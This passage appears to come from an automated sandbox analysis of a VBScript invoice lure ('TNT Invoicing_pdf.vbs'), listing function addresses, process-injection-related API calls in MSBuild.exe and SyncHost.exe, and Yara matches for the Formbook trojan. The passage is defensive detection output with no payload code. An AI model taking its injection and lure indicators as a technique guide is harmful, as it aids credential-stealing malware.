Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04653010 NtOpenDirectoryObject, 13_2_04653010
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04653090 NtSetValueKey, 13_2_04653090
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04652C00 NtQueryInformationProcess, 13_2_04652C00
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04652CF0 NtOpenProcess, 13_2_04652CF0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04652CC0 NtQueryVirtualMemory, 13_2_04652CC0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04653D70 NtOpenThread, 13_2_04653D70
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04652D00 NtSetInformationFile, 13_2_04652D00
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04653D10 NtOpenProcessToken, 13_2_04653D10
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04652DB0 NtEnumerateKey, 13_2_04652DB0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04652E30 NtWriteVirtualMemory, 13_2_04652E30
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04652EA0 NtAdjustPrivilegesToken, 13_2_04652EA0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04652F60 NtCreateProcessEx, 13_2_04652F60
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04652FA0 NtQuerySection, 13_2_04652FA0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04652F90 NtProtectVirtualMemory, 13_2_04652F90
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04652AB0 NtWaitForSingleObject, 13_2_04652AB0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04652B80 NtQueryInformationFile, 13_2_04652B80
Detected potential crypto function
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00401000 10_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0040FB5A 10_2_0040FB5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0040FB63 10_2_0040FB63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0042D333 10_2_0042D333
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_004033C5 10_2_004033C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_004033D0 10_2_004033D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0040247E 10_2_0040247E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00416430 10_2_00416430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00416433 10_2_00416433
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00402480 10_2_00402480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00402C8D 10_2_00402C8D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00402C90 10_2_00402C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0040FD83 10_2_0040FD83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00402644 10_2_00402644
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00402650 10_2_00402650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00402669 10_2_00402669
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0040DE03 10_2_0040DE03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00402F40 10_2_00402F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00402F3D 10_2_00402F3D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0109A118 10_2_0109A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01088158 10_2_01088158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010CB16B 10_2_010CB16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0103516C 10_2_0103516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010C01AA 10_2_010C01AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0100B1B0 10_2_0100B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010B81CC 10_2_010B81CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEF172 10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010070C0 10_2_010070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010AF0CC 10_2_010AF0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010B70E9 10_2_010B70E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010BF0E0 10_2_010BF0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FF0100 10_2_00FF0100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010B132D 10_2_010B132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010BA352 10_2_010BA352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0104739A 10_2_0104739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010C03E6 10_2_010C03E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0100E3F0 10_2_0100E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010A0274 10_2_010A0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010052A0 10_2_010052A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FED34C 10_2_00FED34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101B2C0 10_2_0101B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010802C0 10_2_010802C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010A12ED 10_2_010A12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01000535 10_2_01000535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010B7571 10_2_010B7571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010C0591 10_2_010C0591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FF1460 10_2_00FF1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0109D5B0 10_2_0109D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010BF43F 10_2_010BF43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010B2446 10_2_010B2446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010AE4F6 10_2_010AE4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01024750 10_2_01024750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01000770 10_2_01000770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010BF7B0 10_2_010BF7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FFC7C0 10_2_00FFC7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010B16CC 10_2_010B16CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101C6E0 10_2_0101C6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FE68B8 10_2_00FE68B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01009950 10_2_01009950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101B950 10_2_0101B950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01016962 10_2_01016962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010029A0 10_2_010029A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010CA9A6 10_2_010CA9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0106D800 10_2_0106D800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01002840 10_2_01002840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0100A840 10_2_0100A840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010038E0 10_2_010038E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0102E8F0 10_2_0102E8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010BAB40 10_2_010BAB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010BFB76 10_2_010BFB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FFEA80 10_2_00FFEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101FB80 10_2_0101FB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010B6BD7 10_2_010B6BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01075BF0 10_2_01075BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0103DBF9 10_2_0103DBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010BFA49 10_2_010BFA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010B7A46 10_2_010B7A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01073A6C 10_2_01073A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01045AA0 10_2_01045AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0109DAAC 10_2_0109DAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010ADAC6 10_2_010ADAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0100AD00 10_2_0100AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FF0CF2 10_2_00FF0CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01003D40 10_2_01003D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010B1D5A 10_2_010B1D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010B7D73 10_2_010B7D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01018DBF 10_2_01018DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101FDC0 10_2_0101FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01000C00 10_2_01000C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FFADE0 10_2_00FFADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01079C32 10_2_01079C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010A0CB5 10_2_010A0CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010BFCF2 10_2_010BFCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010BFF09 10_2_010BFF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01042F28 10_2_01042F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01020F30 10_2_01020F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01074F40 10_2_01074F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01001F92 10_2_01001F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0107EFA0 10_2_0107EFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010BFFB1 10_2_010BFFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0100CFE0 10_2_0100CFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010BEE26 10_2_010BEE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FF2FC8 10_2_00FF2FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01000E59 10_2_01000E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01012E90 10_2_01012E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010BCE93 10_2_010BCE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01009EB0 10_2_01009EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010BEEDB 10_2_010BEEDB
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe Code function: 12_2_034D87BA 12_2_034D87BA
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe Code function: 12_2_034DA790 12_2_034DA790
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe Code function: 12_2_034E0E40 12_2_034E0E40
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe Code function: 12_2_034E0E3D 12_2_034E0E3D
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe Code function: 12_2_034F7D40 12_2_034F7D40
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe Code function: 12_2_034DA567 12_2_034DA567
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe Code function: 12_2_034DA570 12_2_034DA570
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04611460 13_2_04611460
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046D2446 13_2_046D2446
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046DF43F 13_2_046DF43F
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046CE4F6 13_2_046CE4F6
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046D7571 13_2_046D7571
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04620535 13_2_04620535
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046BD5B0 13_2_046BD5B0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046E0591 13_2_046E0591
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_0463C6E0 13_2_0463C6E0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046D16CC 13_2_046D16CC
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04620770 13_2_04620770
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04644750 13_2_04644750
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_0461C7C0 13_2_0461C7C0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046DF7B0 13_2_046DF7B0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046D70E9 13_2_046D70E9
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046DF0E0 13_2_046DF0E0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046CF0CC 13_2_046CF0CC
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046270C0 13_2_046270C0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046EB16B 13_2_046EB16B
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_0465516C 13_2_0465516C
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_0460F172 13_2_0460F172
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04610100 13_2_04610100
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046BA118 13_2_046BA118
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046D81CC 13_2_046D81CC
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046E01AA 13_2_046E01AA
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_0462B1B0 13_2_0462B1B0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046C0274 13_2_046C0274
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046C12ED 13_2_046C12ED
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_0463B2C0 13_2_0463B2C0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046252A0 13_2_046252A0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_0460D34C 13_2_0460D34C
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046DA352 13_2_046DA352
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046D132D 13_2_046D132D
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046E03E6 13_2_046E03E6
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_0462E3F0 13_2_0462E3F0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_0466739A 13_2_0466739A
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04699C32 13_2_04699C32
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04620C00 13_2_04620C00
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04610CF2 13_2_04610CF2
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046DFCF2 13_2_046DFCF2
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046C0CB5 13_2_046C0CB5
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046D7D73 13_2_046D7D73
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04623D40 13_2_04623D40
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046D1D5A 13_2_046D1D5A
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_0462AD00 13_2_0462AD00
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_0461ADE0 13_2_0461ADE0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_0463FDC0 13_2_0463FDC0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04638DBF 13_2_04638DBF
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04620E59 13_2_04620E59
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046DEE26 13_2_046DEE26
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046DEEDB 13_2_046DEEDB
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04629EB0 13_2_04629EB0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04632E90 13_2_04632E90
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046DCE93 13_2_046DCE93
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04694F40 13_2_04694F40
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04662F28 13_2_04662F28
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04640F30 13_2_04640F30
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046DFF09 13_2_046DFF09
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_0462CFE0 13_2_0462CFE0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04612FC8 13_2_04612FC8
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046DFFB1 13_2_046DFFB1
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04621F92 13_2_04621F92
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04622840 13_2_04622840
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_0462A840 13_2_0462A840
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_0468D800 13_2_0468D800
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046238E0 13_2_046238E0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_0464E8F0 13_2_0464E8F0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046068B8 13_2_046068B8
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04636962 13_2_04636962
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04629950 13_2_04629950
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_0463B950 13_2_0463B950
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046229A0 13_2_046229A0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046EA9A6 13_2_046EA9A6
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04693A6C 13_2_04693A6C
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046DFA49 13_2_046DFA49
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046D7A46 13_2_046D7A46
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046CDAC6 13_2_046CDAC6
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04665AA0 13_2_04665AA0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046BDAAC 13_2_046BDAAC
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_0461EA80 13_2_0461EA80
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046DFB76 13_2_046DFB76
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046DAB40 13_2_046DAB40
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_0465DBF9 13_2_0465DBF9
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046D6BD7 13_2_046D6BD7
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_0463FB80 13_2_0463FB80
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe Code function: 17_2_0566F471 17_2_0566F471
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe Code function: 17_2_05675F81 17_2_05675F81
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe Code function: 17_2_056711C8 17_2_056711C8
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe Code function: 17_2_056711D1 17_2_056711D1
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe Code function: 17_2_0568E9A1 17_2_0568E9A1
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe Code function: 17_2_056713F1 17_2_056713F1
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe Code function: 17_2_05677AA1 17_2_05677AA1
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe Code function: 17_2_05677A9E 17_2_05677A9E
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 01035130 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 00FEB970 appears 272 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 0106EA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 0107F290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 01047E54 appears 97 times
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: String function: 04655130 appears 36 times
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: String function: 0468EA12 appears 86 times
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: String function: 04667E54 appears 89 times
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: String function: 0460B970 appears 268 times
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: String function: 0469F290 appears 105 times
Java / VBScript file with very long strings (likely obfuscated code)
Source: TNT Invoicing_pdf.vbs Initial sample: Strings found which are bigger than 50
Yara signature match
Source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.2683472741.0000000004270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
